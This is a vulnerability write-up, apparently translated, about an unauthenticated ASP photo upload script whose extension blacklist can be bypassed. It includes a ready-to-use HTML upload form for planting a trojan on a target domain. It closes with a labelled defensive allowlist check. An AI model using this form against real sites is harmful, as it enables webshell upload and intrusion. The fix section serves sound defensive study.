Open the admin directory and find an upload.asp file, which makes its decision based on the submitted file.
If Uprequest.form("file_Err") <> 0 Then
    Select Case Uprequest.form("file_Err")
However, even after reading it for a long time, I haven't seen what this file_Err reads. (I am very fond of it) Go to the front-end directory and check whether there is anything useful.
This file was also found at the front-end.
Open the source of Upload_Photo.asp and find that the submitted address is Upfile_Photo.asp.
Open the source code of Upfile_Photo.asp and find that the program does not check the user's identity. If the program has been uploaded, we can directly submit it.
Continue reading down. The more you look at it, the more familiar it seems. I have posted the code for the vulnerability below.
For i = 0 To UBound(arrUpFileType)
    ' Determine the file suffix. If it is one of the suffixes the program requires, set the EnableUpload variable to True
    If fileEXT = Trim(arrUpFileType(i)) Then
        EnableUpload = True
        Exit For
    End If
Next
' Determine whether the file suffix is one of the three types asp, asa, and aspx
If fileEXT = "asp" Or fileEXT = "asa" Or fileEXT = "aspx" Then
    ' The key issue is here: suffixes such as cer and php are not filtered, and Trim is not used to strip spaces
    EnableUpload = False
End If
' Determine whether our EnableUpload variable is True or False; True means the file is valid
If EnableUpload = False Then
    msg = "this file type cannot be uploaded! Only these file types can be uploaded: " & UpFileType
    FoundErr = True
End If
strJS = "" & vbCrLf
' The FoundErr variable is checked again here; if it is not True, the file can be uploaded
If FoundErr <> True Then
    Randomize
    ranNum = Int(900 * Rnd) + 100
    filename = "big" & Year(Now) & Month(Now) & Day(Now) & Hour(Now) & Minute(Now) & Second(Now) & ranNum & "." & fileExt
    smallfilename = Year(Now) & Month(Now) & Day(Now) & Hour(Now) & Minute(Now) & Second(Now) & ranNum & "." & fileExt
    ' Save the file
    ofile.SaveToFile Server.MapPath(SavePath & filename)

Isn't this the same as the previous Mobile upload vulnerability? Since there is no component to upload multiple files in this environment, we can bypass the check by uploading two files with different suffixes at the same time, so as to directly submit our Trojan horse to the server.
Change 127.0.0.1 to the domain name URL you want to submit.
<form action="http://127.0.0.1/Upfile_Photo.asp" method="post" name="form1" enctype="multipart/form-data">
<input name="FileName" type="file" class="tx1" size="21">
<input name="FileName1" type="file" class="tx1" size="21">
<input type="submit" name="Submit" value="Upload" style="border: 1px double rgb(88,88,88); font: 9pt">
<input name="PhotoUrlID" type="hidden" id="PhotoUrlID" value="1">
</form>
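For comparison with the suffix check in Upfile_Photo.asp quoted above, here is an added example (not code from the application or from the original post) of an allowlist-only check that normalizes the suffix and decides each file independently. The function names, the allowlist, and the sample file names are assumptions made up for the illustration; it runs as a stand-alone script under cscript.

```vbscript
Option Explicit

' Added example, not the application's code. Save under any name and run
' with cscript //nologo. The allowlist and file names are constructed samples.

' Return the lower-cased text after the last dot, or "" when there is none.
Function NormalizedExt(ByVal fileName)
    Dim name, dot
    NormalizedExt = ""
    name = LCase(Trim(fileName))          ' "x.ASP " and "x.asp" compare equal
    dot = InStrRev(name, ".")
    ' No dot, a leading dot only, or a trailing dot: treat as "no extension".
    If dot < 2 Or dot = Len(name) Then Exit Function
    NormalizedExt = Trim(Mid(name, dot + 1))
End Function

' Deny by default. The result is computed from scratch on every call, so the
' decision made for one file never carries over to another file in the request.
' There is no separate blacklist step: anything not on the allowlist
' (cer, php, asp, ...) is refused.
Function IsAllowedExt(ByVal ext, ByVal allowed)
    Dim item
    IsAllowedExt = False
    If ext = "" Then Exit Function
    For Each item In allowed
        If ext = LCase(Trim(item)) Then
            IsAllowedExt = True
            Exit Function
        End If
    Next
End Function

Dim allowed, samples, s
allowed = Array("jpg", "gif", "png")      ' hypothetical photo allowlist
samples = Array("photo.jpg", "PHOTO.GIF ", "page.cer", "page.php", _
                "page.asp ", "noext", "dot.")
For Each s In samples
    WScript.Echo "[" & s & "] -> " & IsAllowedExt(NormalizedExt(s), allowed)
Next
```

In the upload handler, the check would be called once per uploaded file, after the user's login has been verified, and the stored file name would be built from the normalized suffix rather than from the raw client value.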